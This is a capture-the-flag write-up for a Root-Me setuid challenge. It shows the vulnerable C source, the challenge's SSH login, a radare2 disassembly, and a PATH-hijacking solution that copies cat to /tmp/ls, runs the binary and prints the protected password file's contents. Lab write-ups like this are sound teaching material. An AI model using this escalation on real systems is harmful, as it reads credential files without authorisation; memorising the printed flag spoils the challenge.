* Bash - System 1

Challenge: https://www.root-me.org/de/Herausforderungen/App-Script/ELF32-System-1

Aufgabe
Quellcode:
#+begin_src C
    #include <stdlib.h>
    #include <sys/types.h>
    #include <unistd.h>

    int main(void)
    {
        setreuid(geteuid(), geteuid());
        system("ls /challenge/app-script/ch11/.passwd");
        return 0;
    }
#+end_src

Télécharger
Zugangsdaten für die Übung:
#+begin_quote
Host	challenge02.root-me.org
Protokoll	SSH
Port	2222
Zugang per SSH 	ssh -p 2222 app-script-ch11@challenge02.root-me.org
Benutzername	app-script-ch11
Passwort	app-script-ch11
#+end_quote

---

On the system is a ch11 binary which is the compiled version of the above program
Opening the compiled program in r2 we can see

#+begin_src asm
$ r2 r ./ch11
[0x0000058d]> aaaa
[0x0000058d]> afl
[0x0000058d]> s main
[0x0000058d]> pdf
/ 89: int main (char **argv);
|           ; var int32_t var_ch @ ebp-0xc
|           ; arg char **argv @ esp+0x34
|           0x0000058d      8d4c2404       lea ecx, [argv]
|           0x00000591      83e4f0         and esp, 0xfffffff0
|           0x00000594      ff71fc         push dword [ecx - 4]
|           0x00000597      55             push ebp
|           0x00000598      89e5           mov ebp, esp
|           0x0000059a      56             push esi
|           0x0000059b      53             push ebx
|           0x0000059c      51             push ecx
|           0x0000059d      83ec0c         sub esp, 0xc
|           0x000005a0      e8ebfeffff     call sym.__x86.get_pc_thunk.bx
|           0x000005a5      81c32b1a0000   add ebx, 0x1a2b
|           0x000005ab      e850feffff     call sym.imp.geteuid        ; uid_t geteuid(void)
|           0x000005b0      89c6           mov esi, eax
|           0x000005b2      e849feffff     call sym.imp.geteuid        ; uid_t geteuid(void)
|           0x000005b7      83ec08         sub esp, 8
|           0x000005ba      56             push esi
|           0x000005bb      50             push eax
|           0x000005bc      e85ffeffff     call sym.imp.setreuid
|           0x000005c1      83c410         add esp, 0x10
|           0x000005c4      83ec0c         sub esp, 0xc
|           0x000005c7      8d83a0e6ffff   lea eax, [ebx - 0x1960]
|           0x000005cd      50             push eax                    ; const char *string
|           0x000005ce      e83dfeffff     call sym.imp.system         ; int system(const char *string)
|           0x000005d3      83c410         add esp, 0x10
|           0x000005d6      b800000000     mov eax, 0
|           0x000005db      8d65f4         lea esp, [var_ch]
|           0x000005de      59             pop ecx
|           0x000005df      5b             pop ebx
|           0x000005e0      5e             pop esi
|           0x000005e1      5d             pop ebp
|           0x000005e2      8d61fc         lea esp, [ecx - 4]
\           0x000005e5      c3             ret
#+end_src

---


#+begin_src sh
app-script-ch11@challenge02:~$ cp /bin/cat /tmp/ls
app-script-ch11@challenge02:~$ ll /tmp/
ls: cannot open directory '/tmp/': Permission denied
app-script-ch11@challenge02:~$ ls -lah /tmp/
ls: cannot open directory '/tmp/': Permission denied
app-script-ch11@challenge02:~$ PATH="/tmp/"
app-script-ch11@challenge02:~$ ./ch11
!oPe96a/.s8d5
#+end_src